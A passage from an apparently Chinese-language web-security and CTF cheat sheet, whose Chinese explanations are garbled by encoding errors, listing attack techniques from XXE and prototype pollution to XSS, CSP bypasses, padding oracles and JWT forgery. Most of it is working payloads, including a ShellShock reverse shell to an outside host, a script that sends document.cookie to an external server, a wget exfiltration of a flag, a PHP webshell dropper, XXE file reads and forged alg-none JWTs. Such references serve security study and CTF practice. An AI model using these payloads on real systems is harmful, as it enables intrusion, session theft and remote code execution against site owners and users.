<7u141-b00or<8u131-b09: ä¸åæªæ¡ä¸\nçå½±é¿>jdk8u131: è½å»ºç« FTP é£ç·ï¼å¤å¸¶æªæ¡å §å®¹ä¸å«\nåæåºç°å¸¸>jdk8u232: ä¸è½å»ºç« FTP é£ç·ï¼è¥ url ä¸å«æ\nåæåºç°å¸¸
SOAP
<soap:Body>
<foo>
<![CDATA[<!DOCTYPE doc [<!ENTITY % dtd SYSTEM "http://kaibro.tw:22/"> %dtd;]><xxx/>]]>
</foo>
</soap:Body>
XInclude
<?xml version="1.0" encoding="UTF-8"?>
<root xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include href="http://kaibro.tw/file.xml"></xi:include>
</root>
XSLT
Read local file:
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:abc="http://php.net/xsl" version="1.0">
<xsl:template match="/">
<xsl:value-of select="unparsed-text('/etc/passwd', 'utf-8')"/>
</xsl:template>
</xsl:stylesheet>
å ¶å®
- Document XXE
- DOCX
- XLSX
- PPTX
- https://github.com/BuffaloWill/oxml_xxe
Prototype Pollution
goodshit = {}
goodshit.__proto__.password = "ggininder"
user = {}
console.log(user.password)
# => ggininder
let o1 = {}
let o2 = JSON.parse('{"a": 1, "__proto__": {"b": 2}}')
merge(o1, o2)
console.log(o1.a, o1.b)
# => 1 2
o3 = {}
console.log(o3.b)
# => 2
jQuery
-
CVE-2019-11358
- jQuery < 3.4.0
$.extend
let a = $.extend(true, {}, JSON.parse('{"__proto__": {"devMode": true}}')) console.log({}.devMode); // true
Lodash
-
SNYK-JS-LODASH-608086
- versions < 4.17.17
- 觸ç¼é»:
setWith(),set() - Payload:
setWith({}, "__proto__[test]", "123")set({}, "__proto__[test2]", "456")
-
CVE-2020-8203
- versions < 4.17.16
- 觸ç¼é»:
zipObjectDeep() - Payload:
zipObjectDeep(['__proto__.z'],[123])console.log(z)=> 123
-
CVE-2019-10744
- versions < 4.17.12
- 觸ç¼é»:
defaultsDeep() - Payload:
{"type":"test","content":{"prototype":{"constructor":{"a":"b"}}}} - Example:
-
CVE-2018-16487 / CVE-2018-3721
- versions < 4.17.11
- 觸ç¼é»:
merge(),mergeWith(),defaultsDeep()
var _= require('lodash'); var malicious_payload = '{"__proto__":{"oops":"It works !"}}'; var a = {}; _.merge({}, JSON.parse(malicious_payload));
Process Spawning
- å¦æå¯ä»¥æ±¡æç°å¢è®æ¸+Process spawningï¼å°ææ©æRCE
const { exec, execSync, spawn, spawnSync, fork } = require('child_process');
// pollute
Object.prototype.env = {
NODE_DEBUG : 'require("child_process").execSync("touch pwned")//',
NODE_OPTIONS : '-r /proc/self/environ'
};
// method 1
fork('blank');
// method 2
spawn('node', ['blank']).stdout.pipe(process.stdout);
// method 3
console.log(spawnSync('node', ['blank']).stdout.toString());
// method 4
console.log(execSync('node blank').toString());
({}).__proto__.NODE_OPTIONS = '--require=./malicious-code.js';
console.log(spawnSync(process.execPath, ['subprocess.js']).stdout.toString());
({}).__proto__.NODE_OPTIONS = `--experimental-loader="data:text/javascript,console.log('injection');"`;
console.log(spawnSync(process.execPath, ['subprocess.js']).stdout.toString());
- å¦æå¯ä»¥è
Object.prototype.shellï¼å spawn ä»»ææ令é½å¯ RCE
const child_process = require('child_process');
Object.prototype.shell = 'node';
Object.prototype.env = {
NODE_DEBUG : '1; throw require("child_process").execSync("touch pwned").toString()//',
NODE_OPTIONS : '-r /proc/self/environ'
};
child_process.execSync('id');
-
è£å ï¼èç°å¢è®æ¸çå種ç©æ³ (https://blog.p6.is/Abusing-Environment-Variables/)
-
Example
require
- ä½çæ¬ gadget
- 實測 Node 15.x, 16.x, 17.x é½ææ©æ work
a = {}
a["__proto__"]["exports"] = {".":"./pwn.js"}
a["__proto__"]["1"] = "./"
require("./index.js")
-
é«çæ¬ gadget
- æ§å¶ trySelf ç data, path åæ¸å¯ä»¥ä»»æ LFI
- å¼å ¥ç°å¢ä¸ç preinstall.js æ yarn.js çæªæ¡å¯ RCE
- v18.8.0 works
{ "__proto__":{ "data":{ "name":"./usage", "exports":"./preinstall.js" }, "path":"/opt/yarn-v1.22.19/", "shell":"sh", "contextExtensions":[ { "process":{ "env":{ "npm_config_global":"1", "npm_execpath":"" }, "execPath":"wget\u0020http://1.3.3.7/?p=$(/readflag);echo" } } ], } } - æ§å¶ trySelf ç data, path åæ¸å¯ä»¥ä»»æ LFI
-
Example
Misc
- https://github.com/HoLyVieR/prototype-pollution-nsec18/blob/master/paper/JavaScript_prototype_pollution_attack_in_NodeJS.pdf
- https://github.com/BlackFan/client-side-prototype-pollution
- https://github.com/msrkp/PPScan
- EJS RCE
outputFunctionName- ç´æ¥æ¼æ¥å°æ¨¡æ¿å·è¡
- 污æå³å¯ RCE:
Object.prototype.outputFunctionName = "x;process.mainModule.require('child_process').exec('touch pwned');x"; - è£å
: ä¸éè¦ Prototype Pollution ç RCE (ejs render 誤ç¨)
- æ¼æ´æå :
res.render('index.ejs', req.body); req.bodyæ污æå°optionsé²è污æå°outputFunctionName(HPP)- Example: AIS3 EOF 2019 Quals - echo
- æ¼æ´æå :
Frontend
XSS
Cheat Sheet
- https://portswigger.net/web-security/cross-site-scripting/cheat-sheet
- https://tinyxss.terjanq.me/
- Tiny XSS Payload
Basic Payload
<script>alert(1)</script><svg/onload=alert(1)><img src=# onerror=alert(1)><a href="javascript:alert(1)">g</a><input type="text" value="g" onmouseover="alert(1)" /><iframe src="javascript:alert(1)"></iframe>- ...
Testing
<script>alert(1)</script>'"><script>alert(1)</script><img/src=@ onerror=alert(1)/>'"><img/src=@ onerror=alert(1)/>' onmouseover=alert(1) x='" onmouseover=alert(1) x="`onmouseover=alert(1) x=`javascript:alert(1)//- ....
ç¹é
//(javascript 註解) 被é濾æï¼å¯ä»¥å©ç¨ç®æ¸éç®ç¬¦ä»£æ¿<a href="javascript:alert(1)-abcde">xss</a>
- HTML ç¹æ§
- ä¸å大å°å¯«
<ScRipT><img SrC=#>
- 屬æ§å¼
src="#"src='#'src=#src=`#`(IE)
- ä¸å大å°å¯«
- 編碼ç¹é
<svg/onload=alert(1)><svg/onload=alert(1)>(16é²ä½) (åèå¯å»æ)
- ç¹ç©ºç½
<img/src='1'/onerror=alert(0)>
- ç¹éå¶åå
<script>onerror=alert;throw 1</script><script>{onerror=alert}throw 1</script><script>throw onerror=alert,1</script><script>throw[onerror]=[alert],1</script><script>var{a:onerror}={a:alert};throw 1</script><script>'alert\x281\x29'instanceof{[Symbol.hasInstance]:eval}</script><script>new FunctionX${document.location.hash.substr1}</script>
å ¶ä»
-
ç¹æ®æ¨ç±¤
- 以ä¸æ¨ç±¤ä¸çè ³æ¬ç¡æ³å·è¡
<title>,<textarea>,<iframe>,<plaintext>,<noscript>...
-
innerHTML
<script>ä¸æ被 trigger- å
¶ä»æ¨ç±¤å¯ï¼ä¾å¦:
<img src=@ onerror=alert()> - double
<svg>trick<svg><svg onload=alert()>- éé innerHTML æå ¥æï¼æç«å³è¢«è§¸ç¼
- Example
-
Protocol
- javascript:
<a href=javascript:alert(1) >xss</a><iframe src="javascript:alert(1)">- with new line:
<a href="javascript://%0aalert(1)">XSS</a> - assignable protocol with location:
<script>location.protocol='javascript'</script>- Example: portswigger cheatsheet
- data:
<a href=data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==>xss</a>
- javascript:
-
Javascript èªè§£ç¢¼æ©å¶
<input type="button" onclick="document.write('<img src=@ onerror=alert(1) />')" />- ææå
alert(1)ï¼å çº javascript ä½æ¼ HTML ä¸ï¼å¨å·è¡ javascript åæå 解碼 HTML 編碼 - ä½è¥æ¯å
å¨
<script>ä¸ç javascriptï¼ä¸æ解碼 HTML 編碼 - æ¤ç·¨ç¢¼çº HTML entity å
&#xH;(hex),&#D;(dec) å½¢å¼
-
Javascript ä¸æä¸å¥ç·¨ç¢¼/解碼å½æ¸
- escape/unescape
- encodeURI/decodeURI
- encodeURIComponent/decodeURICompinent
-
ä¸äº
alert(document.domain)çæ¹æ³(alert)(document.domain);al\u0065rt(document.domain);al\u{65}rt(document.domain);[document.domain].map(alert);window['alert'](document.domain);alert.call(null,document.domain);alert.bind()(document.domain);- https://gist.github.com/tomnomnom/14a918f707ef0685fdebd90545580309
-
Some Payload
<svg/onload=alert(1);alert(2)><svg/onload="alert(1);alert(2)"><svg/onload="alert(1);alert(2)">;;æ¹æ;æ失æ- éå¼èå¯å»æ
- å¯10é²ä½, 16é²ä½æ··å
<svg/onload=\u0061\u006c\u0065\u0072\u0074(1)>\uå½¢å¼åªè½ç¨å¨ javascriptï¼ä¾å¦onloadçaæ¹æ\u0061æ失æ
<title><a href="</title><svg/onload=alert(1)>- title åªå æ¬è¼å¤§ï¼ç´æ¥ä¸æ·å ¶ä»æ¨ç±¤
<svg><script>prompt(1)</script>- å çº
<svg>ï¼HTML Entities æ被解æ - å»æ
<svg>æ失æï¼<script>ä¸æ解æEntities
- å çº
<? foo="><script>alert(1)</script>"><! foo="><script>alert(1)</script>"></ foo="><script>alert(1)</script>"><% foo="><script>alert(1)</script>">
-
Markdown XSS
[a](javascript:prompt(document.cookie))[a](j a v a s c r i p t:prompt(document.cookie))[a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)[a](javascript:window.onerror=alert;throw%201)- ...
-
SVG XSS
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert(document.domain);
</script>
</svg>
- iframe srcdoc XSS
<iframe srcdoc="<svg/onload=alert(document.domain)>">
- Polyglot XSS
- Example: PlaidCTF 2018 wave XSS
- ä¸å³
.waveæª (ææª¢æ¥ signatures)RIFF`....WAVE...` alert(1); function RIFF(){}- è®æåæ³ç js èªæ³
- waveå¨apache mime type ä¸æ²æ被å®ç¾©
<script src="uploads/this_file.wave">
- Text fragment
:~:text=xxx- New feature in Chrome 80
- Chrome will scroll to and highlight the first instance of that text fragment
- Example
CSP evaluator
https://csp-evaluator.withgoogle.com/
Bypass CSP
-
base
- æ¹è®è³æºè¼å ¥çåï¼å¼å ¥æ¡æç js
<base href ="http://kaibro.tw/">- RCTF 2018 - rBlog
-
script nonce
<p>å¯æ§å §å®¹<p> <script src="xxx" nonce="AAAAAAAAAAA"></script>æå ¥
<script src="http//kaibro.tw/uccu.js" a="<p><script src="http//kaibro.tw/uccu.js" a="<p> <script src="xxx" nonce="AAAAAAAAAAA"></script> -
Script Gadget
- https://www.blackhat.com/docs/us-17/thursday/us-17-Lekies-Dont-Trust-The-DOM-Bypassing-XSS-Mitigations-Via-Script-Gadgets.pdf
- is an existing JS code on the page that may be used to bypass mitigations
- Bypassing CSP strict-dynamic via Bootstrap
<div data-toggle=tooltip data-html=true title='<script>alert(1)</script>'></div>
- Bypassing sanitizers via jQuery Mobile
<div data-role=popup id='--><script>alert(1)</script>'></div>
- Bypassing NoScript via Closure (DOM clobbering)
<a id=CLOSURE_BASE_PATH href=http://attacker/xss></a>
- Bypassing ModSecurity CRS via Dojo Toolkit
<div data-dojo-type="dijit/Declaration" data-dojo-props="}-alert(1)-{">
- Bypassing CSP unsafe-eval via underscore templates
<div type=underscore/template> <% alert(1) %> </div>
- 0CTF 2018 - h4xors.club2
-
google analytics ea
- ea is used to log actions and can contain arbitrary string
- Google CTF 2018 - gcalc2
-
known jsonp endpoint
- Google:
https://accounts.google.com/o/oauth2/revoke?callback=alert(1)https://www.google.com/complete/search?client=chrome&q=hello&callback=alert#1
- JSONBee
- Google:
-
PHP Warnings
- In PHP, when you return any body data before
header()is called, the call will be ignored because the response was already sent to the user and headers must be sent first. - Parameters Limit
$_GET/$_POST: maximum 1000 parameters- A request containing more than 1000 GET parameters, a warning will be sent, and the CSP header won't
- Buffering
- PHP is known for buffering the response to 4096 bytes by default
- ref:
- In PHP, when you return any body data before
-
DNS prefetch
<link rel="dns-prefetch" href="https://data.example.com">
-
WebRTC
- å´æ ¼ CSPï¼å¯ä»¥éé該æ¹æ³å°è³æå¤å³
- ä¾å¦:
default-src 'none'; script-src 'unsafe-inline';
- ä¾å¦:
- WebRTC bypass CSP connect-src policies
async function a(){ c={iceServers:[{urls:"stun:{{user.id}}.x.cjxol.com:1337"}]} (p=new RTCPeerConnection(c)).createDataChannel("d") await p.setLocalDescription() } a(); - å´æ ¼ CSPï¼å¯ä»¥éé該æ¹æ³å°è³æå¤å³
-
Tool
Upload XSS
- htm
- html
- svg
- xml
- xsl
- rdf
- firefox only?
text/rdf/application/rdf+xml
- vtt
- IE/Edge only?
text/vtt
- shtml
- xhtml
- mht / mhtml
- var
- HITCON CTF 2020 - oStyle
- é è¨å®è£ Apache å
å« mod_negotiation 模çµï¼å¯ä»¥è¨ç½® Response ä¸ç
Content-*屬æ§
Content-language: en
Content-type: text/html
Body:----foo----
<script>
fetch('http://orange.tw/?' + escape(document.cookie))
</script>
----foo----
Content-type
- XSS
- https://github.com/BlackFan/content-type-research/blob/master/XSS.md
- text/html
- application/xhtml+xml
- application/xml
- text/xml
- image/svg+xml
- text/xsl
- application/vnd.wap.xhtml+xml
- multipart/x-mixed-replace
- text/rdf
- application/rdf+xml
- application/mathml+xml
- text/vtt
- text/cache-manifest
jQuery
$.getJSON/$.ajaxXSS- ç¶ URL é·å¾å
http://kaibro.tw/x.php?callback=anything - æèªåå¤æ·æ jsonp callbackï¼ç¶å¾ä»¥ javascript å·è¡
- Example: VolgaCTF 2020 Qualifier - User Center
- ç¶ URL é·å¾å
Online Encoding / Decoding
JSFuck
aaencode / aadecode
- http://utf-8.jp/public/aaencode.html
- https://cat-in-136.github.io/2010/12/aadecode-decode-encoded-as-aaencode.html
RPO
- http://example.com/a%2findex.php
- ç覽å¨ææ
a%2findex.phpç¶æä¸åæªæ¡ - Web Server åææ£å¸¸è§£ææ
a/index.php - æ以ç¶ä½¿ç¨ç¸å°è·¯å¾è¼å
¥ css æï¼å°±å¯ä»¥ééé種æ¹å¼è®ç覽å¨è§£æå°å
¶ä»å±¤ç®éä¸çæªæ¡
- å¦æ該æªæ¡å §å®¹å¯æ§ï¼åææ©æ XSS
- èä¾ï¼
/test.phpä¸æ<link href="1/" ...>- å¦æ
/1/index.php給?query=åæ¸ï¼æç´æ¥è¼¸åºè©²åæ¸å §å®¹ - 訪å
/1%2f%3Fquery={}*{background-color%3Ared}%2f..%2f../test.phpå°±æè®èæ¯è®ç´ è²- Server:
/test.php - Browser:
/1%2f%3Fquery={}*{background-color%3Ared}%2f..%2f../test.php- CSS æè¼å
¥
/1/?query={}*{background-color:red}/../../1/
- CSS æè¼å
¥
- CSS èªæ³å®¹é¯çå¾é«
- Server:
- ç覽å¨ææ
CSS Injection
- CSS å¯æ§æï¼å¯ä»¥Leak Information
- Example:
- leak
<input type='hidden' name='csrf' value='2e3d04bf...'> input[name=csrf][value^="2"]{background: url(http://kaibro.tw/2)}input[name=csrf][value^="2e"]{background: url(http://kaibro.tw/2e)}- ...
- SECCON CTF 2018 - GhostKingdom
- leak
XS-Leaks
- Cross-Site Browser Side channel attack
- xsleaks wiki
Frame count
- ä¸åçæ æä¸åæ¸éç frame
- ç¨
window.frames.lengthä¾å¤æ·- çæ A => frame count = x
- çæ B => frame count = y
- x != y
- e.g. Facebook CTF - Secret Note Keeper
- æ¾å°çµæ => frame count >= 1
- æ²æ¾å° => frame count = 0
Timing
- ä¸åçæ æä¸ååææé
- Time(æçµæ) > Time(æ²çµæ)
- æçµææï¼æéè¦è¼å ¥æ¯è¼å¤æ±è¥¿
XSS Filter
- iframeæ£å¸¸è¨ªåï¼æ觸ç¼ä¸æ¬¡onloadäºä»¶
- å¨iframe.srcå°¾ï¼å ä¸
#åè«æ±ï¼æ£å¸¸ä¸æå觸ç¼onloadäºä»¶ - ä½å¦æåæ¬é é¢è¢«filter blockï¼åææ第äºæ¬¡onload
- 第äºæ¬¡è«æ±è®æ
chrome-error://chromewebdata/#
- 第äºæ¬¡è«æ±è®æ
- å¯ä»¥å¤æ·é é¢çæ
- æ£å¸¸ => 1次onload
- 被Blocked => 2次onload
- ä¹è½ç¨
history.lengthå¤æ· - e.g. 35C3 - filemanager
HTTP Cache
- æ¸
空ç®æ¨ Cache
- é POST è«æ±
- æ¥è©¢å
§å®¹
<link rel=prerender href="victim.com">
- 檢æ¥æ¯å¦ Cache 該å
§å®¹
- Referrer è¨è¶ é·ï¼ç¶å¾è¨ªå該è³æº
- æ cache => 顯示è³æº
- æ² cache => æä¸å°è³æº
DOM Clobbering
<form id=test1></form>
<form name=test2></form>
<script>
console.log(test1); // <form id=test1></form>
console.log(test2); // <form name=test2></form>
console.log(document.test1); // undefined
console.log(document.test2); // <form name=test2></form>
</script>
id屬æ§è¢«ç¶æå ¨åè®æ¸name屬æ§è¢«ç¶ædocument屬æ§
- è¦èåçå½æ¸
<form name="getElementById"></form>
<form id="form"></form>
<script>
console.log(document.getElementById("form")); // Error
</script>
<script>
console.log("I'll be executed!");
</script>
é裡第ä¸å script block å çºé¯èª¤è¢«è·³éï¼ç¬¬äºå script block ä¾èæå·è¡ (常æ¿ä¾ç¹æª¢æ¥)
-
toString åé¡
<form id=test1><input name=test2></form> <script> alert(test1.test2); // "[object HTMLInputElement]" </script><a>çhrefå¯ä»¥è§£æ±º toString åé¡:<a id=test1 href=http://kaibro.tw>alert(test1);=>http://kaibro.tw
<form id=test1><a name=test2 href=http://kaibro.tw></form>ä¾èæåé¡alert(test1.test2);=>undefined- 解æ³è¦ä¸é¢ HTMLCollection
- HTMLCollection
<a id=test1>click!</a>
<a id=test1>click2!</a>
<script>
console.log(window.test1); // <HTMLCollection(2) [a#test1, a#test1, test1: a#test1]
</script>
name 屬æ§ä¹æç´æ¥è®æ HTMLCollection ç屬æ§:
<a id="test1"></a>
<a id="test1" name="test2" href="x:alert(1)"></a>
<script>
alert(window.test1.test2); // x:alert(1)
</script>
Shadow DOM
- å¯ä»¥å°é±èãç¨ç«ç DOM éå å°å ç´ ä¸
- éé
Element.attachShadow()å¯ä»¥å°ä¸å Shadow root éå å°ä¸åå ç´ ä¸- åæ¸å¯ä»¥å¸¶
{mode:"open"}ææ¯{mode:"closed"}- open:
Elements of the shadow root are accessible from JavaScript outside the root - closed:
Denies access to the node(s) of a closed shadow root from JavaScript outside it
- open:
- åæ¸å¯ä»¥å¸¶
window.find+-webkit-user-modify+document.execCommand- éé CSS
-webkit-user-modify:read-write屬æ§ï¼å¯ä»¥è® shadow DOM åå°contenteditableææ window.find()å¯ä»¥ focus shadow DOM ä¸çå §å®¹- ä¹å¾å°±è½ç¨
document.execCommand()å»æå ¥ HTMLï¼éé svg å·è¡ JS åå¾ç¯é»document.execCommand('insertHTML',false,'<svg/onload=alert(this.parentNode.innerHTML)>')
- éé CSS
- Example
å¯ç¢¼å¸
PRNG
-
php 7.1.0 å¾
rand()åsrand()å·²ç¶çåmt_rand()åmt_srand()- 測試çµæï¼https://3v4l.org/PIUEo
-
php > 4.2.0 æèªåå°
srand()åmt_srand()æ種- åªé²è¡ä¸æ¬¡ seedï¼ä¸ææ¯æ¬¡
rand()é½ seed
- åªé²è¡ä¸æ¬¡ seedï¼ä¸ææ¯æ¬¡
-
å¯ä»¥ééå·²ç¥ç random çµæï¼å»æ¨ç®é¨æ©æ¸ç¨®åï¼ç¶å¾å°±å¯ä»¥æ¨ç®æ´åé¨æ©æ¸åºå
-
實éæç¨ä¸å¯è½æ碰å°é£ä¸çä¸æ¯åå processï¼å¯ä»¥ç¨
Keep-Aliveä¾ç¢ºä¿é£ä¸åå php process (åªæ seed ä¸æ¬¡) -
7.1 以å
rand()ä½¿ç¨ libc random()ï¼å ¶æ ¸å¿çºï¼state[i] = state[i-3] + state[i-31]- æ以åªè¦æ31åé£çºé¨æ©æ¸å°±è½é 測æ¥ä¸ä¾çé¨æ©æ¸
- å¾ä¾
rand()alias æmt_rand()ï¼æ¡ç¨çæ¯Mersenne Twisterç®æ³
-
Example: HITCON 2015 - Giraffeâs Coffee
ECB mode
Cut and Paste Attack
- æ¯åBlockå å¯æ¹å¼é½ä¸æ¨£ï¼æ以å¯ä»¥æBlocké¨ææå
- èä¾ï¼
user=kaibro;role=user- åè¨ Block é·åº¦çº 8
- æ§é ä¸ä¸ user: (
|ç¨ä¾åé Block)user=aaa|admin;ro|le=useruser=aaa|aa;role=|user
- æåä¸ä¸ï¼(ä¸é¢æ¯å¡å å¯å¾ç Block é½å·²ç¥)
user=aaa|aa;role=|admin;ro
- Example: AIS3 2017 pre-exam
Encryption Oracle Attack
ECB(K, A + B + C)çéç®çµæå¯ç¥- B å¯æ§
- K, A, C æªç¥
- C çå
§å®¹å¯ä»¥éé以ä¸æ¹æ³çåºä¾ï¼
- æ¾åºæå°çé·åº¦ L
- 使å¾å° B æ¹æ L å aï¼è©²æ®µ pattern å好éè¤å
©æ¬¡
...bbbb bbaa aaaa aaaa cccc ......???? ???? 5678 5678 ???? ...
- æ¹æ L-1 å aï¼å¯å¾å°
ECB(K, "aa...a" + C[0])éå Block çå §å®¹ - C[0] å¯çç ´æ±å¾ï¼å¾é¢ä¹ä¾æ¤é¡æ¨
- 常è¦ç¼çå ´æ¯ï¼Cookie
CBC mode
Bit Flipping Attack
- åè¨ IV çº Aãä¸éå¼çº B (Block Decrypt å¾çµæ)ãææçº C
- CBC mode 解å¯æï¼
A XOR B = C - è¥è¦ä½¿è¼¸åºææè®
X - ä¿®æ¹ A çº
A XOR C XOR X - ååæ¬å¼åè®æ
(A XOR C XOR X) XOR B = X
Padding Oracle Attack
PKCS#7- Padding æ¹å¼ï¼ä¸è¶³ x å Byteï¼å°±è£ x å x
- ä¾å¦ï¼Block é·åº¦ 8
AA AA AA AA AA AA AA 01AA AA AA AA AA AA 02 02AA AA AA AA AA 03 03 03- ...
08 08 08 08 08 08 08 08
- å¨å¸¸è¦æ
æ³ä¸ï¼å¦æ解å¯åºä¾ç¼ç¾ Padding æ¯ççï¼æå´ Exception æ Error
- ä¾å¦ï¼HTTP 500 Internal Server Error
- é 注æ以ä¸éé¡æ
æ³ï¼ä¸æå´é¯ï¼
AA AA AA AA AA AA 01 01AA AA 02 02 02 02 02 02
- Padding æ¹å¼ï¼ä¸è¶³ x å Byteï¼å°±è£ x å x
- åçï¼
- CBC mode ä¸ï¼åä¸å¡å¯ææç¶ä½ç¶åéå¡ç IVï¼å XOR
- å¦ææ§é
A||Bå»è§£å¯ (A, B æ¯å¯æ Block) - æ¤æï¼A æ被ç¶ä½ B ç IVï¼B æ被解æ
D(B) XOR A - å¯ä»¥ééèª¿æ´ Aï¼ä½¿å¾ Padding è®åæ³ï¼å°±å¯ä»¥å¾å°
D(B)çå¼- ä¾å¦ï¼è¦è§£æå¾ 1 Byte
- æ³è¾¦æ³è®æå¾è§£åºä¾è®æ
01çµå°¾ - éæ°£ä¸å¥½æï¼å¯è½å好碰å°
02 02çµå°¾ï¼å¯ä»¥èª¿æ´ä¸ä¸ A åæ¸ç¬¬ 2 Byte D(B)[-1] XOR A[-1] = 01D(B)[-1] = A[-1] XOR 01- ææå¾ 1 Byte å°±å¯ä»¥ä¾æ¤é¡æ¨ï¼èª¿æ´åæ¸ç¬¬ 2 Byte
D(B) XOR Cå°±è½å¾å°ææ ( C çºåä¸å¡çæ£çå¯æ)
Length Extension Attack
- å¾å¤hashç®æ³é½å¯è½åå¨æ¤æ»æï¼ä¾å¦
md5,sha1,sha256... - 主è¦æ¯å çºä»åé½ä½¿ç¨ Merkle-Damgard hash construction
- æä¾ç
§ 64 Byte åçµï¼ä¸è¶³æ padding
- 1 byte ç
0x80+ ä¸å 0x00+8 bytes çé·åº¦
- 1 byte ç
- IV æ¯å¯«æ»çï¼ä¸æ¯ä¸çµè¼¸åºçµææç¶ä¸ä¸çµçè¼¸å ¥
- æ»ææ¢ä»¶ï¼ (éè£ md5 ææ sha1, sha256... ä¹éç¨)
- å·²ç¥
md5(secret+message) - å·²ç¥
secreté·åº¦ - å·²ç¥
messageå §å®¹
- å·²ç¥
- 符åä¸åæ¢ä»¶å°±è½æ§é
md5(secret+message+padding+ä»»æå串) - å·¥å
· - hashpump
- åºæ¬ç¨æ³ï¼
- 輸å
¥
md5(secret+message)çå¼ - 輸å
¥
messageçå¼ - 輸å
¥
secerté·åº¦ - è¼¸å ¥è¦å å¨å¾é¢çå串
- æå¾ææ
md5(secret+message+padding+ä»»æå串)åmessage+padding+ä»»æå串å´çµ¦ä½
- 輸å
¥
- åºæ¬ç¨æ³ï¼
å ¶å®
-
Information leak
- .git / .svn
- robots.txt
- /.well-known
- .DS_Store
- .htaccess
- .pyc
- package.json
- server-status
- crossdomain.xml
- admin/ manager/ login/ backup/ wp-login/ phpMyAdmin/
- xxx.php.bak / www.tar.gz / .xxx.php.swp / xxx.php~ / xxx.phps
- /WEB-INF/web.xml
-
æ件解ææ¼æ´
- Apache
- shell.php.ggininder
- shell.php%0a
- httpd 2.4.0 to 2.4.29
- CVE-2017-15715
- IIS
- IIS < 7
- a.asp/user.jpg
- user.asp;aa.jpg
- IIS < 7
- Nginx
- nginx < 8.03
cgi.fix_pathinfo=1- Fast-CGIéåçæ³ä¸
- kaibro.jpg:
<?php fputs(fopen('shell.php','w'),'<?php eval($_POST[cmd])?>');?> - 訪å
kaibro.jpg/.phpçæshell.php
- nginx < 8.03
- Apache
-
AWS常è¦æ¼æ´
- S3 bucket æ¬éé
ç½®é¯èª¤
- nslookup å¤æ·
nslookup 87.87.87.87s3-website-us-west-2.amazonaws.com.
- ç¢ºèª bucket
- 訪å
bucketname.s3.amazonaws.com - æåæè¿å bucket XML è³è¨
- 訪å
- awscli å·¥å
·
- åç®é
aws s3 ls s3://bucketname/ --region regionname - ä¸è¼
aws sync s3://bucketname/ localdir --region regionname
- åç®é
- nslookup å¤æ·
- metadata
- S3 bucket æ¬éé
ç½®é¯èª¤
-
JWT (Json Web Token)
-
éç½®ç®æ³ None
import jwt; print(jwt.encode({"userName":"admin","userRoot":1001}, key="", algorithm="none"))[:-1]
-
éç´ç®æ³
- æ"éå°ç¨±å¼å å¯"éç´çº"å°ç¨±å¼å å¯"
- e.g. RS256 æ¹æ HS256
import jwt public = open('public.pem', 'r').read() # public key prin(jwt.encode({"user":"admin","id":1}, key=public, algorithm='HS256')) -
æ´åç ´è§£å¯é°
- Tool: JWT Cracker
- usage:
./jwtcrack eyJhbGci....
- usage:
- Example:
- Tool: JWT Cracker
-
kid åæ¸ (key ID)
- æ¯ä¸åå¯é¸åæ¸
- ç¨æ¼æå®å å¯ç®æ³çå¯é°
- ä»»ææ件è®å
"kid" : "/etc/passwd"
- SQL注å
¥
- kid æå¯è½å¾è³æ庫æåæ¸æ
"kid" : "key11111111' || union select 'secretkey' -- "
- Command Injection
- Ruby open:
"/path/to/key_file|whoami"
- Ruby open:
- Example: HITB CTF 2017 - Pasty
-
jku
- ç¨ä¾æå®é£æ¥å°å å¯ Token å¯é°ç URL
- å¦ææªéå¶ç話ï¼æ»æè
å¯ä»¥æå®èªå·±çå¯é°æ件ï¼ç¨å®ä¾é©è token
- Example: VolgaCTF 2021 Qual - JWT
-
ææè¨æ¯æ´©æ¼
- JWT æ¯ä¿èå®æ´æ§èä¸æ¯ä¿èæ©å¯æ§
- base64 decode å¾å³å¯å¾å° payload å §å®¹
- Example
-
jwt.io
-
-
å¸¸è¦ Port æå
-
php -i | grep "Loaded Configuration File"- ååº php.ini è·¯å¾
-
HTTP Method
- OPTIONS method
- æ¥çå¯ç¨ HTTP method
curl -i -X OPTIONS 'http://evil.com/'
- HEAD method
- ç¹æ®å ´æ¯ä¸å®¹æåºç¾é輯åé¡
if(request.method == get) {...} else {...} - Werkzeug åªè¦æè¨å®æ¥å
GETè«æ±ï¼ä¹æèªåæ¥åHEAD(ref) - Example:
- ç¹æ®å ´æ¯ä¸å®¹æåºç¾é輯åé¡
- OPTIONS method
-
ShellShock
() { :; }; echo vulnerable() { :a; }; /bin/cat /etc/passwd() { :; }; /bin/bash -c '/bin/bash -i >& /dev/tcp/kaibro.tw/5566 0>&1'
-
X-forwarded-for å½é ä¾æºIP
Client-IPX-Client-IPX-Real-IPX-Remote-IPX-Remote-AddrX-Host- ...
- åç¨®ç¹ Limit (e.g. Rate limit bypass)
- Heroku feature
- https://jetmind.github.io/2016/03/31/heroku-forwarded.html
- åæéå¤å
X-Forwarded-Forheaderï¼å¯ä»¥è®ç實 IP 被å å¨ IP list ä¸é (Spoofing) - Example: angstromCTF 2021 - Spoofy
-
DNS Zone Transfer
dig @1.2.3.4 abc.com axfr- DNS Server:
1.2.3.4 - Test Domain:
abc.com
- DNS Server:
-
IIS çæªååè
- Windows 8.3 æ ¼å¼:
administratorå¯ä»¥ç°¡å¯«æadmini~1 - åçï¼çæªååå¨æä¸åå¨ï¼ä¼ºæå¨åæå §å®¹ä¸å
- Example
- MidnightSun CTF 2024 - ASPowerTools
webClient.DownloadString("http://../inetpub/wwwroot/aspowertools/FLAGFL~1.MAS")
- MidnightSun CTF 2024 - ASPowerTools
- Tool:
- https://github.com/irsdl/IIS-ShortName-Scanner
java -jar iis_shortname_scanner.jar 2 20 http://example.com/folder/
- https://github.com/sw33tLie/sns
- https://github.com/irsdl/IIS-ShortName-Scanner
- Windows 8.3 æ ¼å¼:
-
ASP.net Cookieless DuoDrop (CVE-2023-36899 & CVE-2023-36560)
- CVE-2023-36899
/WebForm/(S(X))/prot/(S(X))ected/target1.aspx/WebForm/(S(X))/b/(S(X))in/target2.aspx
- CVE-2023-36560
